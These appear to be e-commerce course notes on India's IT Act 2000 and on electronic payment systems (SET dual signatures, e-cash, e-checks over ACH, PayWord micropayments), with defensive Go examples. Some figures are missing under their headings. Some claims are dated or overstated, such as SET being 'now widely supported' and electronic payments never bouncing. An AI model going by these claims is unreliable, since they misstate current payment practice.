The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences -

Section 65: Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66: Hacking. Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A: Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


CHARACTERISTICS OF PAYMENT SYSTEM

There is no paper involved, so electronic payments can be effected directly from home or office.

Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

Electronic payments are fully traceable.

In Ireland the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

Most banks offer same-day value for payments made to other accounts held in that same bank.

Many banks offer same-day money transfer inter-bank services for large value payments.

Unlike cheques, electronic payments don't 'bounce' - payments will not be effected unless the funds are available in the first place.


Features of Payment Methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENTS METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (Fund Transfer)

• A payment method should be:

- Very secure

- Having low overhead cost

- Transferable

- Acceptable anywhere

- Divisible

- Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:

- Confidentiality - sensitive messages are encrypted so that they are kept confidential

- Integrity - nearly all messages are digitally signed to ensure content integrity

- Authentication - authentication is performed through a public key infrastructure

SET network architecture

Merchant: a seller which is connected to an acquirer

Cardholder: a registered holder of the credit card who is a buyer

Issuer: the bank that issues the credit card to a cardholder

Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers

• A merchant can process various credit cards through a single acquirer

• Payment Gateway: this is typically connected to the acquirer

- The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment

SET Digital Certificate System


Dual signature generation and verification -

• In the physical credit card system:

- the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential

- data integrity can basically be ensured by using printed receipts

- cardholder's authentication relies on simple signature checking only

• In an electronic credit card system:

- the Order Information (OI) and PI can be digitally signed to ensure data integrity

- the sensitive credit card information may still be disclosed to other people

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first finds

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where

key_public_sign,cardholder = public signature key of the cardholder

Step 3: Finally he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS, and verifies the DS in the same way, using the received H[OI] directly and computing H[PI] itself from the PI it holds.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or PI is changed, the dual signature will no longer be valid.
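The three verification steps as working Go code, added here and not part of the original notes: the merchant and the payment gateway each rebuild H[ H[PI] || H[OI] ] from the part they hold in clear and check the cardholder's RSA signature over it. SHA-256, PKCS#1 v1.5 and the JSON-like OI/PI samples are assumptions for illustration, not SET's actual message formats.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// DualSignature is what the cardholder produces: DS = Sign_cardholder( H[ H[PI] || H[OI] ] ).
// H[PI] and H[OI] travel with it so each party can rebuild the linked hash
// from the one part it is allowed to see in clear.
type DualSignature struct {
	HashPI []byte // H[PI], sent to the merchant (who never sees PI)
	HashOI []byte // H[OI], sent to the payment gateway (who never sees OI)
	DS     []byte // RSA PKCS#1 v1.5 signature over H[ H[PI] || H[OI] ]
}

// hash is H[.] from the notes; SHA-256 is an assumption (SET itself used SHA-1).
func hash(b []byte) []byte {
	h := sha256.Sum256(b)
	return h[:]
}

// linkHash computes H[ H[PI] || H[OI] ], the value the cardholder signs.
func linkHash(hashPI, hashOI []byte) []byte {
	joined := append(append([]byte{}, hashPI...), hashOI...)
	return hash(joined)
}

// Sign generates the dual signature with the cardholder's private signature key.
func Sign(priv *rsa.PrivateKey, pi, oi []byte) (*DualSignature, error) {
	hPI, hOI := hash(pi), hash(oi)
	ds, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, linkHash(hPI, hOI))
	if err != nil {
		return nil, err
	}
	return &DualSignature{HashPI: hPI, HashOI: hOI, DS: ds}, nil
}

// MerchantVerify is steps 1-3 of the notes: the merchant holds OI in clear plus
// H[PI] and DS, recomputes H[ H[PI] || H[OI] ] and checks it against DS.
func MerchantVerify(pub *rsa.PublicKey, oi, hashPI, ds []byte) bool {
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, linkHash(hashPI, hash(oi)), ds) == nil
}

// GatewayVerify mirrors it for the payment gateway, which holds PI in clear
// plus H[OI] and DS.
func GatewayVerify(pub *rsa.PublicKey, pi, hashOI, ds []byte) bool {
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, linkHash(hash(pi), hashOI), ds) == nil
}

// Scenario runs one constructed purchase: sign, verify at both parties, then
// show that altering the OI amount invalidates the DS at the merchant.
// Returns (merchant ok, gateway ok, merchant ok after tampering, error).
func Scenario() (bool, bool, bool, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048) // cardholder's signature key pair
	if err != nil {
		return false, false, false, err
	}
	// Constructed sample messages; 4111111111111111 is the standard Visa test PAN.
	oi := []byte(`{"order":"ORD-0001","item":"textbook","amount":"1200.00"}`)
	pi := []byte(`{"pan":"4111111111111111","exp":"12/29","amount":"1200.00"}`)

	sig, err := Sign(priv, pi, oi)
	if err != nil {
		return false, false, false, err
	}
	pub := &priv.PublicKey
	merchantOK := MerchantVerify(pub, oi, sig.HashPI, sig.DS)
	gatewayOK := GatewayVerify(pub, pi, sig.HashOI, sig.DS)

	// A tampered order (amount changed in transit) no longer matches the signed link hash.
	tamperedOI := bytes.Replace(oi, []byte("1200.00"), []byte("12.00"), 1)
	tamperedOK := MerchantVerify(pub, tamperedOI, sig.HashPI, sig.DS)
	return merchantOK, gatewayOK, tamperedOK, nil
}

func main() {
	m, g, t, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("merchant verifies DS: %v\ngateway verifies DS: %v\nmerchant accepts tampered OI: %v\n", m, g, t)
}
```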

DIGITAL ENVELOPE -


SET PROTOCOL -

The SET protocol has four phases: initiation, purchase, authorization and capture.

First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions.


Customers are the users who spend E-Cash.

Merchants and traders are vendors who receive E-Cash.

Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the networks.

Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system -

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works:


This is a simple model of an E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the following steps.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.


In the third phase, the trader approaches the token issuer (the customer's bank), and after authenticating the tokens the issuing bank converts the tokens into electronic funds, which are transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique.

Each number is issued by a bank and represents a specified sum of real money.


It is anonymous and reusable

Electronic Cash Security

Complex cryptographic algorithms prevent double spending

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering
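An added Go example, not from the original notes, of the token flow described above: the issuer signs a serial-numbered token, the merchant verifies the signature before accepting it, and the issuer refuses a serial it has already redeemed, which is the double-spending check. It uses a plain RSA signature, so unlike real E-cash it is not anonymous (that needs blind signatures); the key size, denominations and the "whole rupees" unit are assumptions.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Token is the "number" the notes describe: a unique serial plus a face
// value, signed by the issuing bank so a merchant can check it before accepting it.
type Token struct {
	Serial [16]byte // unique, like the serial number on a currency note
	Value  uint32   // face value in whole rupees (constructed unit)
	Sig    []byte   // issuer's RSA PKCS#1 v1.5 signature over SHA-256(Serial || Value)
}

// digest binds serial and value together so neither can be altered alone.
func (t Token) digest() []byte {
	var buf [20]byte
	copy(buf[:16], t.Serial[:])
	binary.BigEndian.PutUint32(buf[16:], t.Value)
	h := sha256.Sum256(buf[:])
	return h[:]
}

var (
	ErrBadSignature = errors.New("token signature invalid or token altered")
	ErrDoubleSpent  = errors.New("token serial already redeemed")
)

// Issuer mints tokens and keeps the ledger of serials it has already credited.
type Issuer struct {
	key   *rsa.PrivateKey
	spent map[[16]byte]bool
}

func NewIssuer() (*Issuer, error) {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	return &Issuer{key: k, spent: map[[16]byte]bool{}}, nil
}

func (i *Issuer) PublicKey() *rsa.PublicKey { return &i.key.PublicKey }

// Issue is phase 1 of the model: the customer's account is debited (not modelled
// here) and a freshly serial-numbered, signed token is handed out.
func (i *Issuer) Issue(value uint32) (Token, error) {
	t := Token{Value: value}
	if _, err := rand.Read(t.Serial[:]); err != nil {
		return t, err
	}
	sig, err := rsa.SignPKCS1v15(rand.Reader, i.key, crypto.SHA256, t.digest())
	if err != nil {
		return t, err
	}
	t.Sig = sig
	return t, nil
}

// Verify is the merchant's check in phase 2: is this a genuine, unaltered token?
func Verify(pub *rsa.PublicKey, t Token) bool {
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, t.digest(), t.Sig) == nil
}

// Redeem is phase 3: the merchant presents the token to the issuer, which
// re-checks the signature and refuses any serial it has already paid out,
// so a copied token cannot be spent twice.
func (i *Issuer) Redeem(t Token) error {
	if !Verify(i.PublicKey(), t) {
		return ErrBadSignature
	}
	if i.spent[t.Serial] {
		return ErrDoubleSpent
	}
	i.spent[t.Serial] = true
	return nil
}

func main() {
	issuer, err := NewIssuer()
	if err != nil {
		panic(err)
	}
	tok, _ := issuer.Issue(100)
	fmt.Println("merchant accepts token:", Verify(issuer.PublicKey(), tok))
	fmt.Println("first redeem:", issuer.Redeem(tok))  // <nil>
	fmt.Println("second redeem:", issuer.Redeem(tok)) // double spent
	tok.Value = 1000
	fmt.Println("altered token:", issuer.Redeem(tok)) // bad signature
}
```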

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password is involved. It is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind Internet security threats such as account sweeps or theft. Online hacking and cracking can be avoided by using SSL- and TLS-based website security, keeping the website link on the "https" protocol, and running proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system may be, no one is safe against online frauds. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

While making the payment it is very important that the internet connection and power supply remain active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

An electronic check is simply an electronic version of a paper check. When a traditional check is converted into an electronic payment it can be processed through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks carry more security features than a paper check they give both the business and its customers better protection. Another way to think of an electronic check is a customer paying by entering bank account information online and sending the money electronically. Electronic checks are becoming increasingly popular because they are fast, efficient and secure. They are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs).

eCheck, a payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes of paper checks, was the first electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, the customer's paper check is run through an electronic scanner supplied by the merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from the customer's account and deposits them into the merchant's. After payment approval the virtual terminal prints a receipt for the customer to sign and keep. The employee should then void the paper check and return it to the customer. Merchant transactions can be viewed and reported on online, although features vary by merchant service provider or payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves money electronically from one entity to another. It is a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Because it transfers money directly to and from bank accounts, ACH is faster than traditional paper checks. The ACH payment process mirrors the paper check process, only faster: the client gives a bank routing number and checking account number, and after verification the payment is submitted electronically through the ACH system, which clears it in batches rather than instantly. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting customers' paper checks into electronic checks saves time and reduces hassle for staff, because payments can be submitted electronically instead of by trips to the bank. Time saving and hassle reduction are not the only benefits:

1. Reduced processing costs, by up to 60%. eChecks need less manpower to process and carry no deposit or transaction fees, so processing an eCheck is generally much cheaper than processing a paper check or a credit card transaction.

2. Funds received sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as with traditional check processing; billing companies often receive payment within one day.

3. Increased sales. A business that does not accept paper checks expands its customers' options by offering eChecks. A business converting from paper checks to eChecks can start accepting international and out-of-state checks while using account validation and customer authentication to protect itself from fraud.

4. Working smarter and greener. Electronic check conversion is easy to set up and relies on the trusted ACH Network, and eChecks help reduce the more than 674 million gallons of fuel and 36 million tons of greenhouse gas emissions attributed to transporting paper checks.

5. Fewer errors and less fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that hold records of individuals or companies with a history of fraud.

Protecting your business and your customers

Electronic check conversion is among the more secure methods in the electronic payment processing industry because it layers several controls on each payment:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. The tools available are digital signatures and public key cryptography. A digital signature does not encrypt the data; it gives the receiver a reliable indication that the message came from the holder of a particular private key and has not been altered since it was signed. (A digital certificate is a separate object: it binds that public key to an identity.) Signatures are used on the Internet to confirm the identity of a customer much as a handwritten signature would; because they are hard to forge and easy to transmit they are a good way to verify identity, and they are often used to implement electronic signatures, meaning any electronic data that carries the intent of a signature. In public key cryptography a key pair is used: with electronic check conversion the private key is a secret value used to create the digital signature on the eCheck, and the public key is given to anyone who needs to verify that the sender signed the eCheck and that the transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplicate presentment of the scanned electronic representations of customer checks.

3. Encryption. The banking information travels between merchant, processor and bank over encrypted connections (the source describes 128-bit SSL; TLS is what is used today). The ACH file format itself is not encrypted, so protecting the transport links is what matters, and NACHA's rules require banking information to be encrypted whenever it crosses an unsecured network such as the Internet.

How to get started with electronic checks

Here is how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing matters, but a reliable processor is essential.

2. Notify customers that the business will begin using electronic check conversion. Federal law requires a posted notice of this change and a take-away copy for customers, together with a phone number they can call for more information.

3. Look for a processor that makes it easy to align current business processes with the new electronic processing system, export customer data, and integrate the new system with the business management software.

4. QuickBooks Payments is one complete payment processing solution: it takes ACH bank payments and electronic checks as well as Visa, MasterCard, Discover and American Express cards, and lets businesses email invoices with a Pay Now button. Its vendor reports that businesses using this e-invoicing feature are paid about twice as fast.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer or bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the account's check-writing history is checked. The processor forwards the approve/decline result to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House (ACH) system. Funds are deposited in approximately 1-3 business days.
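The validation in step 4 above, and the authentication and duplicate-detection controls described under "Protecting your business", can be shown in code. The Go program below is an added example written for this page; it is not CyberSource's, QuickBooks' or any processor's code. The ECheck field set, the Ed25519 key pair standing in for the payer's signing key, the SHA-256 fingerprint used for duplicate detection, and the sample values (routing number 123456780, which satisfies the ABA check-digit rule, account 000123456, check 1042) are all constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// ECheck is the field set this example assumes a signed electronic check
// carries; it is not the ACH record layout or any processor's API.
type ECheck struct {
	Routing string // payer's bank ABA routing number
	Account string // payer's account number
	CheckNo string // serial number of the original paper check
	Payee   string
	Cents   int64
}

// canonical fixes field order and separators so signer and verifier hash
// exactly the same bytes.
func (c ECheck) canonical() []byte {
	return []byte(fmt.Sprintf("%s|%s|%s|%s|%d", c.Routing, c.Account, c.CheckNo, c.Payee, c.Cents))
}

// ValidRoutingNumber applies the ABA check-digit rule: nine decimal digits
// whose sum weighted 3,7,1,3,7,1,3,7,1 is divisible by 10. It catches
// keying errors and made-up numbers before anything is submitted; it does
// not prove the number is assigned to a bank, which is the processor's job.
func ValidRoutingNumber(rtn string) bool {
	if len(rtn) != 9 {
		return false
	}
	weights := [9]int{3, 7, 1, 3, 7, 1, 3, 7, 1}
	sum := 0
	for i := 0; i < 9; i++ {
		if rtn[i] < '0' || rtn[i] > '9' {
			return false
		}
		sum += int(rtn[i]-'0') * weights[i]
	}
	return sum%10 == 0
}

// Sign is the payer's side: an Ed25519 signature over the canonical check.
func Sign(priv ed25519.PrivateKey, c ECheck) []byte {
	return ed25519.Sign(priv, c.canonical())
}

// fingerprint identifies one presentment of one check: same account,
// serial and amount is the same check no matter who resubmits it.
func fingerprint(c ECheck) string {
	h := sha256.Sum256([]byte(fmt.Sprintf("%s|%s|%s|%d", c.Routing, c.Account, c.CheckNo, c.Cents)))
	return hex.EncodeToString(h[:])
}

var (
	ErrBadRouting   = errors.New("routing number fails check digit")
	ErrBadSignature = errors.New("signature does not verify")
	ErrDuplicate    = errors.New("check already presented")
)

// Acceptor is the receiving side: the set of fingerprints already accepted.
type Acceptor struct {
	seen map[string]bool
}

func NewAcceptor() *Acceptor { return &Acceptor{seen: map[string]bool{}} }

// Accept runs the controls in order: syntactic validation, then
// authentication, then duplicate detection. A check is recorded as seen only
// after its signature verifies, so a forged copy cannot block the genuine one.
func (a *Acceptor) Accept(pub ed25519.PublicKey, c ECheck, sig []byte) error {
	if !ValidRoutingNumber(c.Routing) {
		return ErrBadRouting
	}
	if !ed25519.Verify(pub, c.canonical(), sig) {
		return ErrBadSignature
	}
	fp := fingerprint(c)
	if a.seen[fp] {
		return ErrDuplicate
	}
	a.seen[fp] = true
	return nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	// Constructed sample: 123456780 satisfies the check-digit rule.
	chk := ECheck{Routing: "123456780", Account: "000123456", CheckNo: "1042", Payee: "Example Store", Cents: 4599}
	sig := Sign(priv, chk)
	acc := NewAcceptor()
	fmt.Println("first presentment:", acc.Accept(pub, chk, sig))
	fmt.Println("second presentment:", acc.Accept(pub, chk, sig))
	tampered := chk
	tampered.Cents = 459900
	fmt.Println("altered amount:", acc.Accept(pub, tampered, sig))
	bad := chk
	bad.Routing = "123456789"
	fmt.Println("bad routing:", acc.Accept(pub, bad, Sign(priv, bad)))
}
```

The order of the checks is deliberate: the cheap syntactic test runs first, the signature check protects the duplicate table from being poisoned by forged copies, and only a check that passed both is remembered. A real deployment would also carry the payer's public key in a certificate and age entries out of the duplicate table according to the return window.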

Four Different Scenarios of the FSTC E-check System


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A newer type, the micropayment method, is emerging to cater for very low-value transactions. Examples:

- Millicent (pre-payment, credit based)
- PayWord (post-payment)


A MICROPAYMENT IS

- a very small payment made over the Web
- a transaction too small for credit cards
- possibly as little as a fraction of a cent
- an alternative to subscription and advertising
- able to go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange

for something made available online such as an application download a service or Web-based

content

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a

fraction of a cent A special type of system is required for such payments which are too small to

be feasible for processing through credit card companies

Here is one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers; seller-based accounts are more common for repeat business with an individual enterprise.
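The page names PayWord above and describes how micropayments accumulate before they are settled. The Go program below is an added example, not code from the page or from any PayWord implementation; it models the hash-chain mechanism of Rivest and Shamir's PayWord scheme, which is one way to get the "accumulate, then settle once" behaviour described: the payer commits to the start of a SHA-256 hash chain, pays by revealing successive preimages, and the vendor verifies each payment with a hash or two instead of a signature and redeems the whole chain with the broker once. The chain length ChainLen, one unit of value per payword, and the omission of the signed commitment certificate that PayWord attaches to w[0] are this example's assumptions.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

const ChainLen = 100 // number of one-unit paywords per chain (assumption)

// PayerChain is the user's side: w[n] is a random secret, w[i] = H(w[i+1]),
// and w[0] is the commitment handed to the vendor before any payment.
type PayerChain struct {
	w    [][]byte
	next int // index of the next payword to release
}

func NewPayerChain(n int) (*PayerChain, error) {
	root := make([]byte, 32)
	if _, err := rand.Read(root); err != nil {
		return nil, err
	}
	w := make([][]byte, n+1)
	w[n] = root
	for i := n - 1; i >= 0; i-- {
		h := sha256.Sum256(w[i+1])
		w[i] = h[:]
	}
	return &PayerChain{w: w, next: 1}, nil
}

// Commitment is w[0]. In PayWord proper the user signs it together with
// the vendor name and expiry; the signature is omitted here.
func (c *PayerChain) Commitment() []byte { return c.w[0] }

// Pay releases payword number next+k-1, which pays k units at once;
// paywords are never reused, so a release cannot be spent twice.
func (c *PayerChain) Pay(k int) (payword []byte, index int, err error) {
	idx := c.next + k - 1
	if k < 1 || idx >= len(c.w) {
		return nil, 0, errors.New("chain exhausted")
	}
	c.next = idx + 1
	return c.w[idx], idx, nil
}

// VendorAccount is the vendor's side for one payer: the last accepted
// payword and its index. Only the commitment must be stored up front.
type VendorAccount struct {
	last      []byte
	lastIndex int
}

func NewVendorAccount(commitment []byte) *VendorAccount {
	return &VendorAccount{last: commitment}
}

// Receive verifies a payword by hashing it forward (index - lastIndex)
// times; if it lands on the last accepted value, the payer must have held
// the chain secret. Cost per payment is a few hashes and no signatures.
func (v *VendorAccount) Receive(payword []byte, index int) (credited int, err error) {
	if index <= v.lastIndex {
		return 0, errors.New("replayed or out-of-order payword")
	}
	steps := index - v.lastIndex
	cur := payword
	for i := 0; i < steps; i++ {
		h := sha256.Sum256(cur)
		cur = h[:]
	}
	if !bytes.Equal(cur, v.last) {
		return 0, errors.New("payword is not on the committed chain")
	}
	v.last, v.lastIndex = payword, index
	return steps, nil
}

// Redeem is what the vendor presents to the broker once for the whole
// period: the highest payword and its index, worth lastIndex units.
func (v *VendorAccount) Redeem() (payword []byte, units int) {
	return v.last, v.lastIndex
}

func main() {
	payer, err := NewPayerChain(ChainLen)
	if err != nil {
		panic(err)
	}
	vendor := NewVendorAccount(payer.Commitment())
	for _, k := range []int{1, 1, 3} {
		pw, idx, _ := payer.Pay(k)
		n, err := vendor.Receive(pw, idx)
		fmt.Printf("payword %d: credited %d, err=%v\n", idx, n, err)
	}
	_, units := vendor.Redeem()
	fmt.Println("redeem with broker for", units, "units")
}
```

The point to notice is where the cost goes: the expensive public-key operation happens once per chain (on the commitment, omitted here), each micropayment costs a hash, and the vendor presents one value to the broker for the whole run. A payword can be presented only once, and a payword that does not hash back to the last accepted value is rejected.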

Once a common micropayment standard has been established some experts predict that

streaming media sites music and application downloads content vendors sports access sites

and other specialized resources will make pay-per-use common online

Advantages and risks

With a micropayment system many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments suit businesses where even a small per-transaction cost would be inefficient. The main benefits on the customer side are speed and flexibility; on the merchant side, speed and acceptable transaction fees are what matter. As the transactions involve small sums, security does not have the highest priority; trust matters more than security. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. The market entry barriers for new providers are therefore high: any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options

Micropayment providers offer various payment modules. Merchants sign up for an account with a chosen provider and pick a module that suits their needs; the customer then gets one or more options for paying for the desired content or goods. The most common micropayment options are:

- Call2pay: payment by telephone. The customer is asked to call a toll number; the fee is set per call for the desired payment amount.

